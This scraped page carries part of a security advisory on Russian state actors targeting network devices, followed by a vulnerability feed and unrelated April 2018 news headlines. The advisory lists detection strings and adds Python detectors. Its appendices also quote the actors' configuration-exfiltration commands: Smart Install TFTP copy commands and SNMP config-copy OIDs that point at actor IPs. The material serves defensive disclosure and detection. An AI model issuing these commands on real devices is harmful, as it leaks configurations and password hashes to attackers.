'sh nat trans'    
'sho nat trans'     
'show nat trans'
'sh run'           
'sho run'           
'show run'
'sh ver'           
'sho ver'           
'show ver'
'sh isis'          
'sho isis'          
'show isis'
'sh rom-monitor'   
'sho rom-monitor'   
'show rom-monitor'
'sh startup-config'
'sho startup-config'
'show startup-config'
'sh boot'          
'sho boot'          
'show boot'
'enable'          
'enable secret'

Configuration Strings.

Strings associated with Cisco IOS configurations may be seen in the outbound network traffic of unencrypted management tools such as Telnet, HTTP, or TFTP. This is a subset of the possible strings. Network device owners and operators should export the configuration of their particular makes and models to a secure host and examine it for strings that would allow the owner or operator to customize the list for an IDS. Detecting outbound configuration data leaving an organization destined for Internet-based hosts should be a cause for concern and further investigation to ensure the destination is authorized to receive the configuration data. Because configuration data provides an adversary with information—such as the password hashes—to enable future attacks, configuration data should be encrypted between sender and receiver. Outbound configuration files may be triggered by SNMP queries and Cisco Smart Install commands. In such cases, the outbound file would be sent via TFTP. Detecting these strings in network traffic or log files does not confirm compromise. Further analysis is necessary to remove false positives.

Strings:

aaa new-model
advertisement version
BGP router identifier
boot system flash:
Building configuration...
Cisco Internetwork Operating System
Cisco IOS Software,
Configuration register
www.cisco.com/techsupport
Codes: C - connected, S - static
configuration memory
Current configuration :
boot-start-marker
! Last configuration change at 
! NVRAM config last updated at 
interface VLAN
interface FastEthernet
interface GigabitEthernet
interface pos
line protocol is
loopback not set
ip access-list extended
nameif outside
Routing Bit Set on this LSA
route source
router bgp
router ospf
routing table
ROM: Bootstrap program is
snmp-server
system bootstrap
System image file is
PIX VERSION
ASA VERSION
(ASA)
boot-start-marker
boot system flash
boot end-marker
BOOT path-list

 

Appendix B: Other Vendor Command and Configuration Strings

Russian state-sponsored cyber actors could potentially target network devices from other manufacturers. Therefore, operators and owners should review the documentation associated with the make and model they have in operation to identify strings associated with administrative functions. Export the current configuration and identify strings associated with the configuration. Place the device-specific administrative and configuration strings into network-based and host-based IDS. Examples for Juniper JUNOS may include: “enable”, “reload”, “show”, “set”, “unset”, “file copy”, or “request system scripts” followed by other expected parameters. Examples for MikroTik may include: “ip”, “interface”, “firewall”, “password”, or “ping”. See the documentation for your make and model for specific strings and parameters to place on watch.

These strings may be seen in inbound network traffic of unencrypted management tools such as Telnet or HTTP, or in the logs of application-layer firewalls or network devices. Detecting commands from Internet-based hosts should be a cause for concern and further investigation. Detecting these strings in network traffic or log files does not confirm compromise; further analysis is necessary to remove false positives.

The following are important functions to monitor:

  • login
  • displaying or exporting the current configuration
  • copying files from the device to another host, especially a host outside the LAN or one not previously authorized
  • copying files to the device from another host, especially a host outside the LAN or one not previously authorized
  • changes to the configuration
  • creation or destruction of GRE tunnels
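As an added example (not part of the alert), here is a small Python matcher that applies the Appendix A configuration strings and the Appendix B command strings to constructed traffic records, raising alerts only when the peer is Internet-based, as the text recommends. The record layout, the organisation's address ranges, the documentation-range addresses and the string subsets are assumptions.

```python
import ipaddress
import re

# Address ranges the organisation owns (assumption); any other address is "Internet-based".
ORG_NETWORKS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]

# Ports of the unencrypted management protocols the alert names (SMI = Cisco Smart Install).
MGMT_PORTS = {23: "telnet", 80: "http", 69: "tftp", 4786: "smi"}

# Subset of the Appendix A strings that mark configuration data leaving a device.
CONFIG_STRINGS = (
    "aaa new-model", "Building configuration...", "Current configuration :",
    "! Last configuration change at", "enable secret", "snmp-server",
    "boot system flash", "Cisco IOS Software,",
)

# Administrative command strings per make: the Appendix B examples plus Cisco 'copy' (Appendix D).
VENDOR_COMMANDS = {
    "cisco": ("show running-config", "show startup-config", "copy", "enable"),
    "junos": ("show", "set", "unset", "file copy", "request system scripts"),
    "mikrotik": ("ip", "interface", "firewall", "password", "ping"),
}

CONFIG_RE = re.compile("|".join(re.escape(s) for s in CONFIG_STRINGS))
# A command counts only at the start of a line, so 'ip' inside a configuration line is not a hit.
COMMAND_RES = {
    vendor: re.compile(r"(?m)^[ \t]*(" + "|".join(re.escape(c) for c in cmds) + r")\b")
    for vendor, cmds in VENDOR_COMMANDS.items()
}

# Constructed records (not real captures) laid out as src|sport|dst|dport|payload;
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges standing in for Internet hosts.
SAMPLE_RECORDS = [
    # an Internet host issuing commands to a router over Telnet
    "203.0.113.7|51000|10.0.0.1|23|show running-config\ncopy running-config tftp:\n",
    # the router sending its configuration to an Internet host over TFTP
    "10.0.0.1|58000|198.51.100.9|69|!\n! Last configuration change at 10:02:11 UTC\n"
    "aaa new-model\nenable secret 5 <hash-placeholder>\nsnmp-server community public RO\n",
    # the same strings between organisation hosts: no alert
    "10.0.0.5|40000|10.0.0.1|23|show running-config\n",
    "10.0.0.1|58001|10.0.0.200|69|Building configuration...\nCurrent configuration : 1234 bytes\n",
    # a Smart Install session from the Internet carrying the Appendix D command
    "198.51.100.9|44000|10.0.0.2|4786|copy nvram:startup-config tftp://198.51.100.9/r2.conf\n",
]


def is_org_host(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ORG_NETWORKS)


def parse_record(line):
    src, sport, dst, dport, payload = line.split("|", 4)
    return {"src": src, "sport": int(sport), "dst": dst, "dport": int(dport), "payload": payload}


def scan(records):
    """Return one alert per record that carries commands or configuration across the org boundary."""
    alerts = []
    for line in records:
        rec = parse_record(line)
        proto = MGMT_PORTS.get(rec["dport"])
        if proto is None:
            continue
        base = {"proto": proto, "src": rec["src"], "dst": rec["dst"]}
        if not is_org_host(rec["src"]) and is_org_host(rec["dst"]):
            # inbound: an Internet-based client sends administrative commands to an org device
            hits = {}
            for vendor, regex in COMMAND_RES.items():
                found = sorted({m.group(1) for m in regex.finditer(rec["payload"])})
                if found:
                    hits[vendor] = found
            if hits:
                alerts.append(dict(base, kind="inbound-command", matches=hits))
        elif is_org_host(rec["src"]) and not is_org_host(rec["dst"]):
            # outbound: configuration text from an org device heading to an Internet host
            found = sorted(set(CONFIG_RE.findall(rec["payload"])))
            if found:
                alerts.append(dict(base, kind="outbound-config", matches=found))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_RECORDS):
        print(alert)  # a hit warrants investigation; by itself it does not confirm compromise
```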

 

Appendix C: SNMP Queries

  • SNMP query containing any of the following from an external host
    • show run
    • show ip arp
    • show version
    • show ip route
    • show neighbor detail
    • show interface
  • SNMP Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter of “80.255.3.85”
  • SNMP and Cisco's "config copy" management information base (MIB) object identifiers (OIDs): Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter of “87.120.41.3” and community strings of “public”, “private”, or “anonymous”
    OID Name                         OID Value     Meaning
    1.3.6.1.4.1.9.9.96.1.1.1.1.2     1             Protocol type = TFTP
    1.3.6.1.4.1.9.9.96.1.1.1.1.3     1             Source file type = network file
    1.3.6.1.4.1.9.9.96.1.1.1.1.4     4             Destination file type = running config
    1.3.6.1.4.1.9.9.96.1.1.1.1.5     87.120.41.3   TFTP server IP = 87.120.41.3
    1.3.6.1.4.1.9.9.96.1.1.1.1.6     backup        File name = backup
    1.3.6.1.4.1.9.9.96.1.1.1.1.14    4             Activate the status of the table entry
  • SNMP Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter 80.255.3.85
  • SNMP v2c and v1 set-requests with the OID 1.3.6.1.4.1.9.2.1.55 with the TFTP server IP parameter “87.120.41.3”, using community strings “private” and “anonymous”
  • The OID 1.3.6.1.4.1.9.2.1.55.87.120.41.3 is a request to transfer a copy of a router's configuration to the IP address specified in the last four octets of the OID, in this case 87.120.41.3.
  • Since late July 2016, 87.120.41.3 has been scanning thousands of IPs worldwide using SNMP.
  • Between November 21 and 22, 2016, Russian cyber actors attempted to scan using SNMP version 2 Object Identifier (OID) 1.3.6.1.4.9.9.96.1.1.1.1.5 with a value of 87.120.41.3 and a community string of “public”. This command would cause vulnerable devices to exfiltrate configuration data to a specified IP address over TFTP; in this case, IP address 87.120.41.3.
  • SNMP, TFTP, HTTP, Telnet, or SSH traffic to or from the following IPs
    • 210.245.123.180

 

Appendix D: SMI Queries

Between June 29 and July 6, 2017, Russian actors used the Cisco Smart Install protocol to scan for vulnerable network devices. Two Russian cyber actor-controlled hosts, 91.207.57.69(3) and 176.223.111.160(4), connected to IPs on several network ranges on port 4786 and sent the following two commands:

  • copy nvram:startup-config flash:/config.text
  • copy nvram:startup-config tftp://[actor address]/[actor filename].conf

In early July 2017, the commands sent to targets changed slightly, copying the running configuration file instead of the startup configuration file. Additionally, the second command copies the file saved to flash memory instead of directly copying the configuration file.

  • copy system:running-config flash:/config.text
  • copy flash:/config.text tftp://[actor address]/[actor filename].conf
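As an added example (not part of the alert), this Python walks the copy commands of one Smart Install session and distinguishes the direct export from the staged variant described above, so that a configuration reaching a TFTP host outside the organisation is flagged either way. The session lists, the placeholder address 198.51.100.9 and the organisation's ranges are constructed assumptions.

```python
import ipaddress
import re

# Address ranges the organisation owns (assumption); hosts outside them are treated as external.
ORG_NETWORKS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]

COPY_RE = re.compile(r"^\s*copy\s+(\S+)\s+(\S+)\s*$")
CONFIG_NAMES = {"nvram:startup-config", "system:running-config", "startup-config", "running-config"}
REMOTE_SCHEMES = ("tftp://", "ftp://", "rcp://", "scp://", "http://", "https://")
LOCAL_PREFIXES = ("flash:", "bootflash:", "disk0:", "nvram:")

# Constructed sessions (not the alert's captures); 198.51.100.9 stands in for "[actor address]".
SAMPLE_SESSIONS = {
    # the June/July 2017 pair: direct export of the startup configuration
    "direct": ["copy nvram:startup-config flash:/config.text",
               "copy nvram:startup-config tftp://198.51.100.9/r1.conf"],
    # the early-July variant: running configuration staged in flash, then the staged file exported
    "staged": ["copy system:running-config flash:/config.text",
               "copy flash:/config.text tftp://198.51.100.9/r1.conf"],
    # a routine backup to the organisation's own TFTP server
    "backup": ["copy running-config tftp://10.0.0.200/backups/r1.cfg"],
}


def classify(target):
    """Return (kind, detail): ('config', None), ('remote', host), ('local', path) or ('other', target)."""
    if target in CONFIG_NAMES:
        return "config", None
    for scheme in REMOTE_SCHEMES:
        if target.startswith(scheme):
            host = target[len(scheme):].split("/", 1)[0].rsplit("@", 1)[-1]  # drop any user:pass@
            return "remote", host
    if target.startswith(LOCAL_PREFIXES):
        return "local", target
    return "other", target


def is_org_host(host):
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname or placeholder is not known to be ours
    return any(addr in net for net in ORG_NETWORKS)


def analyze_session(commands):
    """Walk one session's copy commands, remembering local files that hold a copy of the configuration."""
    staged = set()
    events = []
    for cmd in commands:
        match = COPY_RE.match(cmd)
        if not match:
            continue
        src, dst = match.groups()
        src_kind, src_info = classify(src)
        dst_kind, dst_info = classify(dst)
        if src_kind == "config" and dst_kind == "local":
            staged.add(dst_info)
            events.append({"type": "config-staged", "file": dst_info, "cmd": cmd})
        elif dst_kind == "remote" and (src_kind == "config" or src_info in staged):
            events.append({"type": "config-export", "host": dst_info, "external": not is_org_host(dst_info),
                           "via_staged_file": src_kind == "local", "cmd": cmd})
        elif dst_kind == "remote":
            events.append({"type": "file-export", "host": dst_info, "external": not is_org_host(dst_info),
                           "cmd": cmd})
    return events


if __name__ == "__main__":
    for name, commands in SAMPLE_SESSIONS.items():
        print(name, analyze_session(commands))
```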

References

Revision History

  • April 16, 2018: Initial Version
  • April 19, 2018: Added third-party reporting




SecurityFocus Vulnerabilities
last updated: Mon, 23 Apr 2018 14:54:06 GMT

 2018-04-23 Vuln: Google Android Qualcomm Components Multiple Security Vulnerabilities
 2018-04-23 Vuln: Linux Kernel 'net/netfilter/xt_TCPMSS.c' Denial of Service Vulnerability
 2018-04-23 Vuln: Linux Kernel 'net/netlink/af_netlink.c' Local Information Disclosure Vulnerability
 2018-04-23 Vuln: Linux Kernel CVE-2017-8824 Local Privilege Escalation Vulnerability
  Bugtraq: [SE-2011-01] The origin and impact of vulnerabilities in ST chipsets

Yahoo News - Latest News & Headlines
last updated: Mon, 23 Apr 2018 14:40:46 GMT

 Mon, 23 Apr 2018 09:09:19 -0400 The Great Republican Tax Cut Backfire

Did you have a happy Tax Day? Are you feeling grateful for the Republican tax


 Sun, 22 Apr 2018 11:48:37 -0400 As chemical weapons inspectors reach Douma, Syria claims suspected attack was fake

The chemical weapons inspectors reached the city of Douma, now under Russian and Syrian control, two weeks after the suspected attack took place.


 Sun, 22 Apr 2018 17:42:38 -0400 Waffle House Customer Hailed A Hero After Wrestling Rifle Away From Shooter

A 29-year-old man is being hailed as a hero after he single-handedly disarmed


 Sat, 21 Apr 2018 12:23:46 -0400 Suspect in Ocala, Florida school shooting: ‘I want to be put away’

As students around the country rallied against gun violence on Friday, one student was injured in a shooting at a Florida high school. The suspect spoke to local NBC reporter Matt Lupoli.


 Sun, 22 Apr 2018 03:12:02 -0400 Perez: Democrats' Trump-Russia lawsuit isn't a fundraising stunt

DNC Chairman Tom Perez dismisses criticisms of a civil lawsuit filed against the Trump campaign. "Those are almost the precise quotes we heard from the Nixon campaign in 1972."


 Sat, 21 Apr 2018 19:22:25 -0400 Man killed in random knife attack at California steakhouse

LOS ANGELES (AP) — A homeless man who randomly stabbed a patron in a crowded Southern California restaurant to death as he was holding his daughter was reported just a few hours earlier for disruptive behavior, but police ultimately determined he was not a threat, authorities said Saturday.


 Sun, 22 Apr 2018 15:17:58 -0400 Southwest Cancels 40 Flights as It Works to Inspect Plane Engines After Deadly Explosion

The same engine that exploded last week powers nearly all of Southwest's fleet


 Sun, 22 Apr 2018 18:59:30 -0400 Who is Scott Pruitt? EPA chief whose whole career has been dogged by ethics concerns

Early in Scott Pruitt’s political career, as a state senator from Tulsa, Oklahoma, he attended a gathering at the Oklahoma City home of an influential telecommunications lobbyist who was nearing retirement and about to move away. The lobbyist said that after the 2003 gathering, Mr Pruitt – who had a modest legal practice and a state salary of $38,400 – reached out to her. “For those ego-minded politicians, it would be pretty cool to have this house close to the Capitol,” said the lobbyist, Marsha Lindsey.


 Sat, 21 Apr 2018 11:48:31 -0400 'Overwhelmed' Letter Carrier Allegedly Held Onto 17,000 Pieces Of Mail

An "overwhelmed" New York City postal worker stashed more than 17,000 pieces


 Sat, 21 Apr 2018 11:04:35 -0400 Mourning Barbara Bush

Several former U.S. presidents were among the 1,500 mourners expected to gather at a Houston church on Saturday for the funeral of former first lady Barbara Bush, who died on Tuesday at the age of 92.


 Sat, 21 Apr 2018 15:42:20 -0400 Video shows bullet-ridden vehicle after police shooting

Diante Yarber was driving the Ford Mustang when Barstow police officers shot in the vehicle and killed him.


 Sun, 22 Apr 2018 13:48:36 -0400 Failed talks with North Korea may lead to war

Jung Pak, senior fellow at the Brookings Institution, says there is little to fall back on if talks between President Trump and Supreme Leader Kim Jong-un fail.


 Sat, 21 Apr 2018 18:40:51 -0400 R. Kelly's Lawyer, Publicist And Assistant Flee From Singer Amid Scandals

Singer R. Kelly's scandals may be too much for the people he employs. Since


 Sat, 21 Apr 2018 12:01:25 -0400 Avoid romaine lettuce, CDC warns, amid E. coli outbreak

The warning stems from romaine lettuce grown in Yuma, Arizona and shipped across the country, with the CDC telling grocery stores, restaurants, and consumers not to eat the lettuce unless they can be certain it didn’t come from that area.


 Sun, 22 Apr 2018 22:16:25 -0400 Islamic State suicide bomber kills 57 in Afghan capital

KABUL, Afghanistan (AP) — An Islamic State suicide bomber attacked a voter registration center in Afghanistan's capital on Sunday, killing 57 people and wounding more than 100 others, officials said.


 Sun, 22 Apr 2018 06:35:36 -0400 Korean Air boss apologises as hot-tempered daughters resign

Korean Air Chairman Cho Yang-ho on Sunday apologised for the "immature" behaviour of his two daughters and said they would both immediately resign from their company posts following separate controversies. Cho Hyun-min, the younger daughter who is marketing executive at the South Korean flag carrier, is under police investigation for assault after she was accused of throwing water into a man's face at a business meeting. Four years ago her older sister Cho Hyun-ah made global headlines for angrily kicking a cabin crew member off a plane after being served macadamia nuts in a bag rather than a bowl -- an incident quickly dubbed "nut rage".


 Sun, 22 Apr 2018 11:08:34 -0400 Manhunt Continues After 29-Year-Old Shooter Kills 4 at Nashville Waffle House

The shooter is still at large


 Sat, 21 Apr 2018 23:08:14 -0400 NASA Releases Astounding Video Of The Lagoon Nebula To Celebrate Hubble's Birthday

Ever wanted to zoom near that central bulge in the Milky Way in the


 Sun, 22 Apr 2018 13:36:32 -0400 Israel dismisses claims that Mossad killed Palestinian activist in Malaysia

Israel’s defence minister has dismissed claims that Israel assassinated a Palestinian Hamas member and scholar who was shot dead in Malaysia. Avigdor Lieberman said it was more likely Fadi al-Batsh, 35, was killed on Saturday as part of “an internal Palestinian dispute.” He also added that al-Batsh, who was a scientist, was a "rocket expert and no saint”. The academic’s family had blamed the Mossad, Israel’s intelligence agency, for orchestrating the assassination. "There are accusations only against the Israeli Mossad and the Malaysian government should accelerate the investigation," al-Batsh's father, Mohamed, said. The Palestinian was killed by two assailants as he was heading to a mosque for dawn prayers, according to local police. Kuala Lumpur police chief Datuk Seri Mazlan Lazim said one of the suspects "fired 10 shots, four of which hit the lecturer in the head and body. He died on the spot." Police said CCTV footage showed him being targeted by gunmen who had waited almost 20 minutes for him to arrive. On Sunday, the inspector general of the Malaysian police, Mohamad Fuzi Harun, said a comprehensive investigation was ongoing. He added that no clear motive had emerged and no arrests have been made so far. “Was he killed by a live bullet? My answer is yes. The post-mortem is ongoing now; we will give details later," he said. Ahmad Zahid Hamidi, Malaysia's deputy prime minister, said the suspects were believed to be Europeans with links to a foreign intelligence agency, according to state news agency Bernama. The militant group, Hamas, described al-Batsh on Twitter as a “young Palestinian scholar from Jabalia in the Gaza Strip."
It added: "He was a distinguished scientist who contributed to the energy sector.” On Saturday they tweeted photos from the condolences tent set up for al-Batsh. The Iz-al Din al Qassam brigade, the Islamic movement’s militant wing, also held a memorial, which suggested al-Batsh was one of its military commanders, the Associated Press reported. Al-Batsh was also known as a ‘second’ imam at his local mosque and had reportedly been living in Malaysia for the past 10 years. He is survived by his wife and three children.


 Mon, 23 Apr 2018 06:32:23 -0400 HRW: 'Men only' job ads show ongoing discrimination in China

BEIJING (AP) — One job ad for Chinese high-speed train conductors called for candidates who were "fashionable and beautiful." Another ad targeting men for a job in a Chinese internet company included photos of a female employee pole-dancing.


 Sat, 21 Apr 2018 12:07:22 -0400 North Korea says it’s suspending nuclear and missile tests

The announcement said the suspension will continue so long as there are no nuclear threats against North Korea and contained no indication that the country would give up its nuclear weapons.


 Sat, 21 Apr 2018 14:07:34 -0400 Michael Cohen, Donald Trump and the curse of loyalty

A number of analysts have been wondering aloud whether the loyalty of Michael Cohen, President Trump's personal lawyer, will pass the acid test of a federal indictment.


 Sun, 22 Apr 2018 04:30:50 -0400 Britain's Pippa Middleton pregnant with first child: Sun on Sunday

Britain's Pippa Middleton, the younger sister of the Duchess of Cambridge, is pregnant with her first child, The Sun on Sunday newspaper reported. Middleton, 34, gained global fame when she acted as maid of honor at the 2011 wedding of her sister Kate to Prince William, who is second in line to the British throne. Middleton and her financier husband James Matthews married last year.


 Mon, 23 Apr 2018 06:19:00 -0400 Nicaraguan journalist shot dead on Facebook Live while covering protests

A journalist was gunned down during a Facebook Live broadcast as he covered an anti-government protest in Nicaragua. Angel Gahona was describing damage to a cash machine at a bank in the town of Bluefields on the country's southern Caribbean coast, when a shot rang out and he fell to the ground, bleeding from the head. Another reporter in the area, Ileana Lacayo, said Mr Gahona, who worked for the Meridiano news show, died before reaching the hospital.


 Sun, 22 Apr 2018 04:16:07 -0400 Iran ex-prosecutor jailed months after sentence: media

A former Iranian prosecutor has finally been taken to prison months after being sentenced over the death in custody of a protestor, the judiciary's news agency said Sunday. The delay in starting Saeed Mortazavi's two-year sentence had caused anger and ridicule in recent weeks, with mocked-up "Wanted" posters appearing for the notorious former prosecutor online and around Tehran. The former chief prosecutor for Tehran was sentenced last year over the death of a protester who had been jailed for taking part in the mass protests over alleged election-rigging in 2009.


 Sun, 22 Apr 2018 03:04:39 -0400 Smallville's Allison Mack was allegedly a 'top member' of cult that abused women

Prosecutors claim Allison Mack was second-in-command at the upstate New York headquarters of an alleged cult. As she was led from court in Brooklyn on Friday, Allison Mack appeared to wipe away a tear. Flanked by lawyers and closely shadowed by FBI agents and federal marshals, the 35-year-old’s distress provided the first glimpse of what the future may hold for senior members of an alleged cult known as Nxivm.


 Sat, 21 Apr 2018 16:30:50 -0400 Colin Kaepernick Receives Amnesty International's Highest Honor For Activism

Amnesty International on Saturday named former San Francisco 49ers quarterback


 Sun, 22 Apr 2018 19:35:47 -0400 Shark bite victim previously attacked by bear and rattlesnake

A Colorado man made it third time unlucky as he was attacked by a shark in Hawaii having already been mauled by a bear and bitten by a rattlesnake, all in less than four years, local media reported. Aged just 20-years-old, Dylan McWilliams was bodyboarding in the ocean off Kauai on Thursday, when what he believed to be a tiger shark between six and eight feet long took hold of his leg. The keen outdoorsman - who said he has worked as a survival training instructor - was able to swim around 30 yards back to shore, where a bystander called paramedics. "I didn't know if I lost half my leg or what," he said. McWilliams, of Grand Junction, western Colorado, received seven stitches in hospital - just months after he was given nine staples in his scalp following an altercation with a black bear at a Colorado summer camp last July. As he slept outdoors, McWilliams said he was awoken by the bear biting the back of his head. It then dragged him, only dropping its grip as he punched it and poked it in the eye. "I guess I was just in the wrong spot at the wrong time," he said of the attack, which caught the attention of media outlets worldwide. The two attacks followed his first run-in with a rattlesnake during a Utah hiking trip. However, he told the Star Advertiser, the bite was not severe, and he was only ill for a couple of days. "My parents are grateful I'm still alive," he added.


 Sat, 21 Apr 2018 12:54:53 -0400 Hamas vows revenge for key member killed in Malaysia

GAZA CITY, Gaza Strip (AP) — Gaza's ruling Hamas militant group said Saturday that a man who was gunned down in Malaysia was an important member of the organization, accusing Israel of being behind the brazen killing.


 Sat, 21 Apr 2018 16:14:00 -0400 Pelosi continues to rail against Republican tax cuts

Republicans consider 'phase 2' of the tax cuts. Tax Foundation's Scott Hodge gives his take.


 Sun, 22 Apr 2018 10:47:19 -0400 Mitt Romney Fails To Secure Utah Senate GOP Nomination, Will Face Primary

Mitt Romney failed to secure the Utah Senate Republican nomination outright at


 Mon, 23 Apr 2018 04:20:51 -0400 Royal baby name: print off the Telegraph's sweepstake and play

Now that the Duchess of Cambridge has gone into labour with her third baby, it might be time to organise a fun flutter with your colleagues on what the new prince or princess will be called. Parking restrictions are already in place outside the Lindo Wing of St Mary's Hospital in London in preparation for the birth which is expected this month. Simply click on the image below to create a printable pdf file, then all you need is a pair of scissors, a pen and up to 40 willing colleagues. The dilemma of what to call the latest addition to the royal family is something the Duke and Duchess of Cambridge are no doubt wrestling with, but Mary is the public's favourite moniker. Punters have been betting that William and Kate will pick Mary if it's a girl - a name which has a long association with the British monarchy. Bookmaker William Hill has made the name their 3-1 favourite followed by Alice 6-1 and Victoria 8-1, while Coral has Mary and Alice as their joint favoured monikers at 5-1, with Victoria next with odds of 8-1. William's great-great grandmother, the wife of George V, was called Mary, a woman who the Prince of Wales still speaks of fondly, and Mary is one of the Queen's middle names. Britain has seen two Marys on the throne - Mary I, known as Bloody Mary for her persecution of Protestants, and Mary II, who ruled jointly as monarch with her Dutch husband, William III. Rupert Adams, from William Hill, said in early April more than 90 per cent of bets placed had been for female names: "The favourite is Mary but I cannot see it as it is massively over backed. Alice is good but personally I am all over Victoria - which makes good sense to me." If William and Kate have a girl they may be considering naming her Alice which was the name of the Duke of Edinburgh's mother.
Princess Alice of Battenberg was born deaf but learned to speak and lip-read four languages, married Prince Andrew of Greece in 1903 and went on to establish an order of nuns and wore a habit to the Queen's coronation in 1953. Her grandmother was another Princess Alice - the third child and second daughter of Queen Victoria - who lived in Germany after marrying Prince Louis of Hesse. She was said to have had a warm heart and opened hospitals, championed women's causes, founded women's guilds and patronised women's unions. She died in 1878 when she was 35. For boys names, William Hill has Albert, Arthur and Fred all at odds of 14-1, while Coral has Albert and Arthur at 12-1, and a number of names at 16-1 including Arthur, Fred and Philip.


 Mon, 23 Apr 2018 06:39:19 -0400 Century-old sunken ship preserved in perfect condition beneath Lake Superior

These stunning images reveal the remains of a more than century-old sunken ship that has been preserved beneath freezing Lake Superior. The ship looks almost exactly the same as it did the day it sunk beneath waves all those years ago.


 Sat, 21 Apr 2018 12:51:06 -0400 Iran rejects US rights report as 'biased'

Iran rejected the latest US human rights report as hypocritical on Saturday, saying it was "biased by political objectives". "Iran considers the annual report by the US State Department and in particular allegations raised about human rights in Iran as absolutely biased by political objectives, which depicts a distorted and unrealistic image of our country's situation," said foreign ministry spokesman Bahram Ghasemi in a statement on the ministry website.


 Mon, 23 Apr 2018 08:11:00 -0400 Two-year-old girl accidentally shot dead by mother in Ohio hotel, police say

A US woman with a permit to carry a concealed gun accidentally shot dead her two-year-old daughter, say police. Patrol officers and paramedics arrived at the Econo Lodge in Wickliffe at around 11pm to find the toddler with a bullet wound to the chest. The young girl later died in hospital despite the efforts of patrol officers and paramedics.


 Mon, 23 Apr 2018 01:31:43 -0400 New Ford Focus ST Reportedly Coming In 2019 With Bigger Engine

The hot hatch is expected to eschew the automatic transmission to go manual-only.


 Mon, 23 Apr 2018 07:07:31 -0400 2019 Toyota Avalon Trying to Shake Reputation as Boring

Toyota is taking a two-pronged attack with its redesigned Avalon, replacing its rather vanilla sedan with a model that has two distinct personalities: sophisticated and sporty. There are essentia...


 Mon, 23 Apr 2018 07:01:11 -0400 S.Korea halts propaganda broadcasts before summit with North

SEOUL, South Korea (AP) — South Korea halted anti-North Korea propaganda broadcasts across their tense border on Monday as officials from the two Koreas met again to work out details of their leaders' upcoming talks, expected to focus on the North's nuclear program.


 Sun, 22 Apr 2018 17:02:06 -0400 G7 foreign ministers' summit to hold tough line on Russia: sources

By David Ljunggren and Lesley Wroughton TORONTO (Reuters) - Foreign ministers from the Group of Seven leading industrialized nations are expected to maintain a tough line on Russia over its involvement in conflicts in Syria and Ukraine, while leaving the door open to cooperation, two sources briefed on the matter said on Sunday. The ministers, meeting in Toronto for two days, spent part of the first day discussing tensions with Russia, which are straining an already bruised relationship with the West. The sources, speaking on condition of anonymity, said a final statement from the ministers was set to maintain an uncompromising line with Moscow, which the G7 has condemned for annexing Crimea and backing militants in eastern Ukraine.


 Sun, 22 Apr 2018 13:27:17 -0400 Trump Celebrates Earth Day By Praising Rollback Of Environmental Protections

President Donald Trump commemorated Earth Day on Sunday by applauding his


 Sun, 22 Apr 2018 16:04:53 -0400 Netflix Sought To Purchase A Chain Of Movie Theaters

Streaming service Netflix has been looking to buy its own series of movie


 Sat, 21 Apr 2018 19:02:14 -0400 White nationalists rally in Newnan, Ga.

The National Socialist Movement, one of the largest neo-Nazi groups in the U.S., held a rally on April 21, 2018, in Newnan, Ga. Community members have opposed the rally and came out to embrace racial unity in the small Georgia town. Fearing a repeat of the violence that broke out after the Charlottesville, Va., demonstrations, hundreds of police officers were stationed in the town during the rally in an attempt to keep the anti-racist protesters and neo-Nazi groups separated.


 Sun, 22 Apr 2018 10:16:07 -0400 4 dead, several injured in Waffle House shooting

One person at the restaurant wrestled the rifle away from the gunman, police said.


 Mon, 23 Apr 2018 09:59:26 -0400 European and US stocks climb

European and US stock markets pushed higher on Monday as trade and geopolitical tensions eased, analysts said.


 Mon, 23 Apr 2018 02:49:13 -0400 Canadian lynched by villagers in Peruvian Amazon after death of elderly healer

A Canadian man was lynched in the Peruvian Amazon after residents of a remote village accused him of killing an 81-year-old medicine woman a day earlier, a spokesman for the attorney general's office said on Sunday. Olivia Arevalo, a traditional healer of the Shipibo-Conibo tribe, was shot twice and died on Thursday near her home in the Amazonian region of Ucayali, said Ricardo Palma Jimenez, the head of a group of prosecutors in Ucayali. Some villagers had blamed Ms Arevalo's murder on Sebastian Paul Woodroffe, a 41-year-old Canadian citizen who lived in the region and who was believed to have been one of her clients, said Jimenez. Police found Mr Woodroffe's body buried just over half a mile from Ms Arevalo's home on Saturday, after a cellphone video recording of the Friday lynching was shared on social media, said Jimenez. The video shows a man groaning in a puddle near a thatched-roof structure as another man puts a rope around his neck and drags him with others looking on. Jimenez said prosecutors were exploring several hypotheses related to Ms Arevalo's murder and that it was too early to name suspects in the case. No arrests had been made yet related to Woodroffe's death, he added. "We will not rest until both murders, of the indigenous woman as well as the Canadian man, are solved," said Jimenez in a phone interview. Jimenez said the man in the video was Mr Woodroffe and that an autopsy of his body showed he died by strangulation after receiving several blows across his body. Ms Arevalo's murder had prompted outrage in Peru following other unsolved murders of indigenous activists who had repeatedly faced death threats related to efforts to keep illegal loggers and oil palm growers off native lands.
Policing is scant over much of the Peruvian Andes and Amazon and villagers in far-flung provinces often punish suspected criminals according to local customs and without the involvement of state police and prosecutors. "Canada extends its deepest condolences following the reported assassination of Olivia Arévalo Lomas, an Indigenous elder and human rights defender," Global Affairs Canada, which manages Canadian foreign relations, said in a statement. "We are also aware that a Canadian was killed in a related incident. Consular services are being provided to the family of the Canadian," it added.


 Mon, 23 Apr 2018 05:28:02 -0400 Volvo S90 Ambience Concept Is A Three-Seater Luxury Cocoon

Combines visuals, sounds, and scents to make your travel as relaxing as possible.


 Sun, 22 Apr 2018 15:40:26 -0400 World's Oldest Person Dies at the Age of 117

World's Oldest Person Dies at the Age of 117

Another Japanese woman now holds the title.


 Sat, 21 Apr 2018 18:47:53 -0400 Saudi security shoots down recreational drone near royal palace

Saudi security shoots down recreational drone near royal palace

By Rania El Gamal and Stephen Kalin

